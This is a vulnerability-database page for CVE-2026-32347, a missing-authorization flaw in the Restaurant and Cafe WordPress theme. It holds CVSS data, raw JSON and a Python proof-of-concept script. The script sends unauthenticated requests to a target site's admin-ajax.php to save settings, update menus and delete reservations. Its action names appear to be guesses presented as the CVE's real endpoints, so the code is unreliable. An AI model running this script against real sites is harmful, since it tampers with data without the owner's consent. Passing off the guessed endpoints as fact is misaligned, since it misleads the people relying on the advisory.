Security Vulnerability Report
中文
CVE-2026-32347 CVSS 5.3 MEDIUM

CVE-2026-32347

Published: 2026-03-13 19:54:46
Last Modified: 2026-04-29 10:17:00

Description

Missing Authorization vulnerability in raratheme Restaurant and Cafe restaurant-and-cafe allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restaurant and Cafe: from n/a through <= 1.2.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Restaurant and Cafe WordPress Theme <= 1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32347 PoC - Restaurant and Cafe WordPress Theme Broken Access Control # This PoC demonstrates the missing authorization vulnerability import requests import sys def exploit_cve_2026_32347(target_url): """ Exploit for CVE-2026-32347: Missing Authorization in Restaurant and Cafe theme The theme fails to properly authorize requests to certain administrative functions. """ print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2026-32347: Missing Authorization vulnerability") # Common WordPress AJAX endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Identify vulnerable endpoints - theme-specific actions without authorization vulnerable_actions = [ "restaurant_cafe_save_settings", "restaurant_cafe_update_menu", "restaurant_cafe_delete_reservation", "restaurant_cafe_manage_bookings" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } for action in vulnerable_actions: print(f"\n[*] Testing action: {action}") # Craft malicious request without authentication data = { "action": action, "nonce": "", # No nonce required due to missing authorization "data": "malicious_payload" } try: response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10) # Check if request was processed (vulnerability present) if response.status_code == 200: print(f"[!] VULNERABLE: Action '{action}' processed without authorization") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Protected: Action '{action}' requires authorization") except requests.exceptions.RequestException as e: print(f"[-] Error testing {action}: {e}") print("\n[*] PoC execution completed") print("[*] Note: Modify actions list based on actual theme version enumeration") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_cve_2026_32347(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32347", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:46.460", "lastModified": "2026-04-29T10:16:59.663", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme Restaurant and Cafe restaurant-and-cafe allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restaurant and Cafe: from n/a through <= 1.2.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en raratheme Restaurant and Cafe restaurant-and-cafe permite la explotación de niveles de seguridad de control de acceso mal configurados. Este problema afecta a Restaurant and Cafe: desde n/a hasta &lt;= 1.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/restaurant-and-cafe/vulnerability/wordpress-restaurant-and-cafe-theme-1-2-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}